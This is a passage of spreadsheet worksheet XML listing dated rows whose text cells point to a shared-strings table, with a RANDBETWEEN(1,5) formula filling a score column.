      </c>
      <c r="E19255" t="s">
        <v>17275</v>
      </c>
      <c r="F19255">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19256" spans="1:6" ht="240" x14ac:dyDescent="0.25">
      <c r="A19256" s="1">
        <v>43145.482881944445</v>
      </c>
      <c r="C19256" t="s">
        <v>559</v>
      </c>
      <c r="E19256" s="2" t="s">
        <v>17276</v>
      </c>
      <c r="F19256">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19257" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19257" s="1">
        <v>43145.476111111115</v>
      </c>
      <c r="C19257" t="s">
        <v>41</v>
      </c>
      <c r="E19257" s="2" t="s">
        <v>17277</v>
      </c>
      <c r="F19257">
        <f t="shared" ca="1" si="300"/>
        <v>3</v>
      </c>
    </row>
    <row r="19258" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19258" s="1">
        <v>43145.473935185182</v>
      </c>
      <c r="C19258" t="s">
        <v>836</v>
      </c>
      <c r="D19258" t="s">
        <v>713</v>
      </c>
      <c r="E19258" s="2" t="s">
        <v>17278</v>
      </c>
      <c r="F19258">
        <f t="shared" ca="1" si="300"/>
        <v>4</v>
      </c>
    </row>
    <row r="19259" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19259" s="1">
        <v>43145.473356481481</v>
      </c>
      <c r="C19259" t="s">
        <v>10</v>
      </c>
      <c r="D19259" t="s">
        <v>817</v>
      </c>
      <c r="E19259" t="s">
        <v>17279</v>
      </c>
      <c r="F19259">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19260" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19260" s="1">
        <v>43145.462870370371</v>
      </c>
      <c r="C19260" t="s">
        <v>10</v>
      </c>
      <c r="D19260" t="s">
        <v>36</v>
      </c>
      <c r="E19260" s="2" t="s">
        <v>17280</v>
      </c>
      <c r="F19260">
        <f t="shared" ca="1" si="300"/>
        <v>1</v>
      </c>
    </row>
    <row r="19261" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19261" s="1">
        <v>43145.460300925923</v>
      </c>
      <c r="C19261" t="s">
        <v>10</v>
      </c>
      <c r="D19261" t="s">
        <v>6</v>
      </c>
      <c r="E19261" t="s">
        <v>17281</v>
      </c>
      <c r="F19261">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19262" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19262" s="1">
        <v>43145.458391203705</v>
      </c>
      <c r="C19262" t="s">
        <v>48</v>
      </c>
      <c r="E19262" t="s">
        <v>17282</v>
      </c>
      <c r="F19262">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19263" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19263" s="1">
        <v>43145.453888888886</v>
      </c>
      <c r="C19263" t="s">
        <v>48</v>
      </c>
      <c r="E19263" t="s">
        <v>17283</v>
      </c>
      <c r="F19263">
        <f t="shared" ca="1" si="300"/>
        <v>5</v>
      </c>
    </row>
    <row r="19264" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19264" s="1">
        <v>43145.436793981484</v>
      </c>
      <c r="C19264" t="s">
        <v>10</v>
      </c>
      <c r="D19264" t="s">
        <v>158</v>
      </c>
      <c r="E19264" s="2" t="s">
        <v>17284</v>
      </c>
      <c r="F19264">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19265" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19265" s="1">
        <v>43145.430902777778</v>
      </c>
      <c r="C19265" t="s">
        <v>836</v>
      </c>
      <c r="D19265" t="s">
        <v>721</v>
      </c>
      <c r="E19265" s="2" t="s">
        <v>17285</v>
      </c>
      <c r="F19265">
        <f t="shared" ca="1" si="300"/>
        <v>2</v>
      </c>
    </row>
    <row r="19266" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A19266" s="1">
        <v>43145.425358796296</v>
      </c>
      <c r="C19266" t="s">
        <v>10</v>
      </c>
      <c r="D19266" t="s">
        <v>20</v>
      </c>
      <c r="E19266" s="2" t="s">
        <v>17286</v>
      </c>
      <c r="F19266">
        <f t="shared" ref="F19266:F19329" ca="1" si="301">RANDBETWEEN(1,5)</f>
        <v>3</v>
      </c>
    </row>
    <row r="19267" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19267" s="1">
        <v>43145.395451388889</v>
      </c>
      <c r="C19267" t="s">
        <v>686</v>
      </c>
      <c r="D19267" t="s">
        <v>271</v>
      </c>
      <c r="E19267" s="2" t="s">
        <v>17287</v>
      </c>
      <c r="F19267">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19268" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19268" s="1">
        <v>43145.390150462961</v>
      </c>
      <c r="C19268" t="s">
        <v>124</v>
      </c>
      <c r="E19268" t="s">
        <v>17288</v>
      </c>
      <c r="F19268">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19269" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19269" s="1">
        <v>43145.383217592593</v>
      </c>
      <c r="C19269" t="s">
        <v>71</v>
      </c>
      <c r="E19269" t="s">
        <v>17289</v>
      </c>
      <c r="F19269">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19270" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19270" s="1">
        <v>43145.34884259259</v>
      </c>
      <c r="C19270" t="s">
        <v>686</v>
      </c>
      <c r="D19270" t="s">
        <v>114</v>
      </c>
      <c r="E19270" s="2" t="s">
        <v>17290</v>
      </c>
      <c r="F19270">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19271" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19271" s="1">
        <v>43145.345902777779</v>
      </c>
      <c r="C19271" t="s">
        <v>623</v>
      </c>
      <c r="E19271" s="2" t="s">
        <v>17291</v>
      </c>
      <c r="F19271">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19272" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A19272" s="1">
        <v>43145.34107638889</v>
      </c>
      <c r="C19272" t="s">
        <v>48</v>
      </c>
      <c r="E19272" s="2" t="s">
        <v>17292</v>
      </c>
      <c r="F19272">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19273" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19273" s="1">
        <v>43145.315474537034</v>
      </c>
      <c r="C19273" t="s">
        <v>63</v>
      </c>
      <c r="E19273" t="s">
        <v>17293</v>
      </c>
      <c r="F19273">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19274" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19274" s="1">
        <v>43145.296319444446</v>
      </c>
      <c r="C19274" t="s">
        <v>10</v>
      </c>
      <c r="D19274" t="s">
        <v>163</v>
      </c>
      <c r="E19274" t="s">
        <v>17294</v>
      </c>
      <c r="F19274">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19275" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19275" s="1">
        <v>43145.266481481478</v>
      </c>
      <c r="C19275" t="s">
        <v>344</v>
      </c>
      <c r="E19275" t="s">
        <v>17295</v>
      </c>
      <c r="F19275">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19276" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19276" s="1">
        <v>43145.263831018521</v>
      </c>
      <c r="C19276" t="s">
        <v>118</v>
      </c>
      <c r="E19276" s="2" t="s">
        <v>17296</v>
      </c>
      <c r="F19276">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19277" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19277" s="1">
        <v>43145.25922453704</v>
      </c>
      <c r="C19277" t="s">
        <v>16</v>
      </c>
      <c r="E19277" t="s">
        <v>17297</v>
      </c>
      <c r="F19277">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19278" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19278" s="1">
        <v>43145.257465277777</v>
      </c>
      <c r="C19278" t="s">
        <v>16</v>
      </c>
      <c r="E19278" t="s">
        <v>17298</v>
      </c>
      <c r="F19278">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19279" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19279" s="1">
        <v>43145.248368055552</v>
      </c>
      <c r="C19279" t="s">
        <v>318</v>
      </c>
      <c r="E19279" t="s">
        <v>17299</v>
      </c>
      <c r="F19279">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19280" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19280" s="1">
        <v>43145.235659722224</v>
      </c>
      <c r="C19280" t="s">
        <v>65</v>
      </c>
      <c r="E19280" s="2" t="s">
        <v>17300</v>
      </c>
      <c r="F19280">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19281" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19281" s="1">
        <v>43145.191168981481</v>
      </c>
      <c r="C19281" t="s">
        <v>48</v>
      </c>
      <c r="E19281" s="2" t="s">
        <v>17301</v>
      </c>
      <c r="F19281">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19282" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19282" s="1">
        <v>43145.182106481479</v>
      </c>
      <c r="C19282" t="s">
        <v>71</v>
      </c>
      <c r="E19282" s="2" t="s">
        <v>17302</v>
      </c>
      <c r="F19282">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19283" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A19283" s="1">
        <v>43145.160717592589</v>
      </c>
      <c r="C19283" t="s">
        <v>139</v>
      </c>
      <c r="E19283" s="2" t="s">
        <v>17303</v>
      </c>
      <c r="F19283">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19284" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A19284" s="1">
        <v>43145.068124999998</v>
      </c>
      <c r="C19284" t="s">
        <v>140</v>
      </c>
      <c r="D19284" t="s">
        <v>141</v>
      </c>
      <c r="E19284" s="2" t="s">
        <v>17304</v>
      </c>
      <c r="F19284">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19285" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19285" s="1">
        <v>43145.049930555557</v>
      </c>
      <c r="C19285" t="s">
        <v>140</v>
      </c>
      <c r="D19285" t="s">
        <v>141</v>
      </c>
      <c r="E19285" t="s">
        <v>17305</v>
      </c>
      <c r="F19285">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19286" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19286" s="1">
        <v>43145.042731481481</v>
      </c>
      <c r="C19286" t="s">
        <v>260</v>
      </c>
      <c r="D19286" t="s">
        <v>1036</v>
      </c>
      <c r="E19286" s="2" t="s">
        <v>17306</v>
      </c>
      <c r="F19286">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19287" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19287" s="1">
        <v>43145.026944444442</v>
      </c>
      <c r="C19287" t="s">
        <v>50</v>
      </c>
      <c r="D19287" t="s">
        <v>14</v>
      </c>
      <c r="E19287" s="2" t="s">
        <v>17307</v>
      </c>
      <c r="F19287">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19288" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19288" s="1">
        <v>43144.994131944448</v>
      </c>
      <c r="C19288" t="s">
        <v>260</v>
      </c>
      <c r="D19288" t="s">
        <v>1036</v>
      </c>
      <c r="E19288" s="2" t="s">
        <v>17308</v>
      </c>
      <c r="F19288">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19289" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A19289" s="1">
        <v>43144.850868055553</v>
      </c>
      <c r="C19289" t="s">
        <v>319</v>
      </c>
      <c r="D19289" t="s">
        <v>320</v>
      </c>
      <c r="E19289" s="2" t="s">
        <v>17309</v>
      </c>
      <c r="F19289">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19290" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19290" s="1">
        <v>43144.840902777774</v>
      </c>
      <c r="C19290" t="s">
        <v>140</v>
      </c>
      <c r="D19290" t="s">
        <v>197</v>
      </c>
      <c r="E19290" s="2" t="s">
        <v>17310</v>
      </c>
      <c r="F19290">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19291" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19291" s="1">
        <v>43144.838136574072</v>
      </c>
      <c r="C19291" t="s">
        <v>260</v>
      </c>
      <c r="D19291" t="s">
        <v>1036</v>
      </c>
      <c r="E19291" s="2" t="s">
        <v>17311</v>
      </c>
      <c r="F19291">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19292" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19292" s="1">
        <v>43144.820983796293</v>
      </c>
      <c r="C19292" t="s">
        <v>260</v>
      </c>
      <c r="D19292" t="s">
        <v>1036</v>
      </c>
      <c r="E19292" s="2" t="s">
        <v>17312</v>
      </c>
      <c r="F19292">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19293" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19293" s="1">
        <v>43144.790393518517</v>
      </c>
      <c r="C19293" t="s">
        <v>260</v>
      </c>
      <c r="D19293" t="s">
        <v>1036</v>
      </c>
      <c r="E19293" s="2" t="s">
        <v>17313</v>
      </c>
      <c r="F19293">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19294" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19294" s="1">
        <v>43144.784502314818</v>
      </c>
      <c r="C19294" t="s">
        <v>10</v>
      </c>
      <c r="D19294" t="s">
        <v>263</v>
      </c>
      <c r="E19294" t="s">
        <v>17314</v>
      </c>
      <c r="F19294">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19295" spans="1:6" ht="90" x14ac:dyDescent="0.25">
      <c r="A19295" s="1">
        <v>43144.78292824074</v>
      </c>
      <c r="C19295" t="s">
        <v>140</v>
      </c>
      <c r="D19295" t="s">
        <v>141</v>
      </c>
      <c r="E19295" s="2" t="s">
        <v>17315</v>
      </c>
      <c r="F19295">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19296" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19296" s="1">
        <v>43144.782881944448</v>
      </c>
      <c r="C19296" t="s">
        <v>10</v>
      </c>
      <c r="D19296" t="s">
        <v>367</v>
      </c>
      <c r="E19296" t="s">
        <v>17316</v>
      </c>
      <c r="F19296">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19297" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19297" s="1">
        <v>43144.775104166663</v>
      </c>
      <c r="C19297" t="s">
        <v>45</v>
      </c>
      <c r="D19297" t="s">
        <v>14</v>
      </c>
      <c r="E19297" s="2" t="s">
        <v>17317</v>
      </c>
      <c r="F19297">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19298" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19298" s="1">
        <v>43144.762731481482</v>
      </c>
      <c r="C19298" t="s">
        <v>260</v>
      </c>
      <c r="D19298" t="s">
        <v>1036</v>
      </c>
      <c r="E19298" s="2" t="s">
        <v>17318</v>
      </c>
      <c r="F19298">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19299" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A19299" s="1">
        <v>43144.758726851855</v>
      </c>
      <c r="C19299" t="s">
        <v>48</v>
      </c>
      <c r="E19299" s="2" t="s">
        <v>17319</v>
      </c>
      <c r="F19299">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19300" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A19300" s="1">
        <v>43144.750474537039</v>
      </c>
      <c r="C19300" t="s">
        <v>10</v>
      </c>
      <c r="E19300" s="2" t="s">
        <v>17320</v>
      </c>
      <c r="F19300">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19301" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19301" s="1">
        <v>43144.739618055559</v>
      </c>
      <c r="C19301" t="s">
        <v>6</v>
      </c>
      <c r="D19301" t="s">
        <v>25</v>
      </c>
      <c r="E19301" t="s">
        <v>17321</v>
      </c>
      <c r="F19301">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19302" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19302" s="1">
        <v>43144.716527777775</v>
      </c>
      <c r="C19302" t="s">
        <v>260</v>
      </c>
      <c r="D19302" t="s">
        <v>1036</v>
      </c>
      <c r="E19302" s="2" t="s">
        <v>17322</v>
      </c>
      <c r="F19302">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19303" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19303" s="1">
        <v>43144.710115740738</v>
      </c>
      <c r="C19303" t="s">
        <v>10</v>
      </c>
      <c r="D19303" t="s">
        <v>244</v>
      </c>
      <c r="E19303" t="s">
        <v>17323</v>
      </c>
      <c r="F19303">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19304" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19304" s="1">
        <v>43144.66510416667</v>
      </c>
      <c r="C19304" t="s">
        <v>260</v>
      </c>
      <c r="D19304" t="s">
        <v>1036</v>
      </c>
      <c r="E19304" s="2" t="s">
        <v>17324</v>
      </c>
      <c r="F19304">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19305" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19305" s="1">
        <v>43144.607453703706</v>
      </c>
      <c r="C19305" t="s">
        <v>10</v>
      </c>
      <c r="D19305" t="s">
        <v>36</v>
      </c>
      <c r="E19305" s="2" t="s">
        <v>17325</v>
      </c>
      <c r="F19305">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19306" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19306" s="1">
        <v>43144.60664351852</v>
      </c>
      <c r="C19306" t="s">
        <v>10</v>
      </c>
      <c r="D19306" t="s">
        <v>23</v>
      </c>
      <c r="E19306" t="s">
        <v>17326</v>
      </c>
      <c r="F19306">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19307" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19307" s="1">
        <v>43144.604629629626</v>
      </c>
      <c r="C19307" t="s">
        <v>10</v>
      </c>
      <c r="D19307" t="s">
        <v>494</v>
      </c>
      <c r="E19307" t="s">
        <v>17327</v>
      </c>
      <c r="F19307">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19308" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19308" s="1">
        <v>43144.602534722224</v>
      </c>
      <c r="C19308" t="s">
        <v>314</v>
      </c>
      <c r="D19308" t="s">
        <v>192</v>
      </c>
      <c r="E19308" s="2" t="s">
        <v>17328</v>
      </c>
      <c r="F19308">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19309" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19309" s="1">
        <v>43144.593171296299</v>
      </c>
      <c r="C19309" t="s">
        <v>41</v>
      </c>
      <c r="E19309" s="2" t="s">
        <v>17329</v>
      </c>
      <c r="F19309">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19310" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19310" s="1">
        <v>43144.571493055555</v>
      </c>
      <c r="C19310" t="s">
        <v>463</v>
      </c>
      <c r="E19310" t="s">
        <v>17330</v>
      </c>
      <c r="F19310">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19311" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19311" s="1">
        <v>43144.571053240739</v>
      </c>
      <c r="C19311" t="s">
        <v>10</v>
      </c>
      <c r="D19311" t="s">
        <v>86</v>
      </c>
      <c r="E19311" t="s">
        <v>17331</v>
      </c>
      <c r="F19311">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19312" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A19312" s="1">
        <v>43144.562604166669</v>
      </c>
      <c r="C19312" t="s">
        <v>6</v>
      </c>
      <c r="D19312" t="s">
        <v>25</v>
      </c>
      <c r="E19312" s="2" t="s">
        <v>17332</v>
      </c>
      <c r="F19312">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19313" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19313" s="1">
        <v>43144.552025462966</v>
      </c>
      <c r="C19313" t="s">
        <v>10</v>
      </c>
      <c r="D19313" t="s">
        <v>89</v>
      </c>
      <c r="E19313" t="s">
        <v>17333</v>
      </c>
      <c r="F19313">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19314" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19314" s="1">
        <v>43144.545208333337</v>
      </c>
      <c r="C19314" t="s">
        <v>10</v>
      </c>
      <c r="D19314" t="s">
        <v>36</v>
      </c>
      <c r="E19314" t="s">
        <v>17334</v>
      </c>
      <c r="F19314">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19315" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19315" s="1">
        <v>43144.53056712963</v>
      </c>
      <c r="C19315" t="s">
        <v>6</v>
      </c>
      <c r="D19315" t="s">
        <v>821</v>
      </c>
      <c r="E19315" t="s">
        <v>17335</v>
      </c>
      <c r="F19315">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19316" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19316" s="1">
        <v>43144.492256944446</v>
      </c>
      <c r="C19316" t="s">
        <v>43</v>
      </c>
      <c r="E19316" s="2" t="s">
        <v>17336</v>
      </c>
      <c r="F19316">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19317" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19317" s="1">
        <v>43144.489652777775</v>
      </c>
      <c r="C19317" t="s">
        <v>6</v>
      </c>
      <c r="D19317" t="s">
        <v>25</v>
      </c>
      <c r="E19317" s="2" t="s">
        <v>17337</v>
      </c>
      <c r="F19317">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19318" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19318" s="1">
        <v>43144.474027777775</v>
      </c>
      <c r="C19318" t="s">
        <v>10</v>
      </c>
      <c r="D19318" t="s">
        <v>20</v>
      </c>
      <c r="E19318" s="2" t="s">
        <v>17338</v>
      </c>
      <c r="F19318">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19319" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19319" s="1">
        <v>43144.471307870372</v>
      </c>
      <c r="C19319" t="s">
        <v>10</v>
      </c>
      <c r="D19319" t="s">
        <v>36</v>
      </c>
      <c r="E19319" t="s">
        <v>17339</v>
      </c>
      <c r="F19319">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19320" spans="1:6" ht="165" x14ac:dyDescent="0.25">
      <c r="A19320" s="1">
        <v>43144.469131944446</v>
      </c>
      <c r="C19320" t="s">
        <v>836</v>
      </c>
      <c r="E19320" s="2" t="s">
        <v>17340</v>
      </c>
      <c r="F19320">
        <f t="shared" ca="1" si="301"/>
        <v>5</v>
      </c>
    </row>
    <row r="19321" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19321" s="1">
        <v>43144.441250000003</v>
      </c>
      <c r="C19321" t="s">
        <v>10</v>
      </c>
      <c r="D19321" t="s">
        <v>86</v>
      </c>
      <c r="E19321" t="s">
        <v>17341</v>
      </c>
      <c r="F19321">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19322" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19322" s="1">
        <v>43144.429722222223</v>
      </c>
      <c r="C19322" t="s">
        <v>107</v>
      </c>
      <c r="E19322" t="s">
        <v>17342</v>
      </c>
      <c r="F19322">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19323" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19323" s="1">
        <v>43144.426631944443</v>
      </c>
      <c r="C19323" t="s">
        <v>10</v>
      </c>
      <c r="D19323" t="s">
        <v>158</v>
      </c>
      <c r="E19323" t="s">
        <v>17343</v>
      </c>
      <c r="F19323">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19324" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A19324" s="1">
        <v>43144.42355324074</v>
      </c>
      <c r="C19324" t="s">
        <v>10</v>
      </c>
      <c r="D19324" t="s">
        <v>89</v>
      </c>
      <c r="E19324" s="2" t="s">
        <v>17344</v>
      </c>
      <c r="F19324">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19325" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19325" s="1">
        <v>43144.418275462966</v>
      </c>
      <c r="C19325" t="s">
        <v>6</v>
      </c>
      <c r="D19325" t="s">
        <v>194</v>
      </c>
      <c r="E19325" t="s">
        <v>17345</v>
      </c>
      <c r="F19325">
        <f t="shared" ca="1" si="301"/>
        <v>1</v>
      </c>
    </row>
    <row r="19326" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A19326" s="1">
        <v>43144.415011574078</v>
      </c>
      <c r="C19326" t="s">
        <v>48</v>
      </c>
      <c r="E19326" s="2" t="s">
        <v>17346</v>
      </c>
      <c r="F19326">
        <f t="shared" ca="1" si="301"/>
        <v>4</v>
      </c>
    </row>
    <row r="19327" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19327" s="1">
        <v>43144.403078703705</v>
      </c>
      <c r="C19327" t="s">
        <v>10</v>
      </c>
      <c r="D19327" t="s">
        <v>178</v>
      </c>
      <c r="E19327" t="s">
        <v>17347</v>
      </c>
      <c r="F19327">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19328" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19328" s="1">
        <v>43144.392094907409</v>
      </c>
      <c r="C19328" t="s">
        <v>471</v>
      </c>
      <c r="E19328" t="s">
        <v>714</v>
      </c>
      <c r="F19328">
        <f t="shared" ca="1" si="301"/>
        <v>2</v>
      </c>
    </row>
    <row r="19329" spans="1:6" ht="300" x14ac:dyDescent="0.25">
      <c r="A19329" s="1">
        <v>43144.373622685183</v>
      </c>
      <c r="C19329" t="s">
        <v>841</v>
      </c>
      <c r="D19329" t="s">
        <v>178</v>
      </c>
      <c r="E19329" s="2" t="s">
        <v>17348</v>
      </c>
      <c r="F19329">
        <f t="shared" ca="1" si="301"/>
        <v>3</v>
      </c>
    </row>
    <row r="19330" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A19330" s="1">
        <v>43144.343333333331</v>
      </c>
      <c r="C19330" t="s">
        <v>65</v>
      </c>
      <c r="D19330" t="s">
        <v>312</v>
      </c>
      <c r="E19330" s="2" t="s">
        <v>17349</v>
      </c>
      <c r="F19330">
        <f t="shared" ref="F19330:F19393" ca="1" si="302">RANDBETWEEN(1,5)</f>
        <v>1</v>
      </c>
    </row>
    <row r="19331" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19331" s="1">
        <v>43144.321458333332</v>
      </c>
      <c r="C19331" t="s">
        <v>1068</v>
      </c>
      <c r="E19331" t="s">
        <v>17350</v>
      </c>
      <c r="F19331">
        <f t="shared" ca="1" si="302"/>
        <v>2</v>
      </c>
    </row>
    <row r="19332" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A19332" s="1">
        <v>43144.287974537037</v>
      </c>
      <c r="C19332" t="s">
        <v>41</v>
      </c>
      <c r="E19332" t="s">
        <v>12688</v>
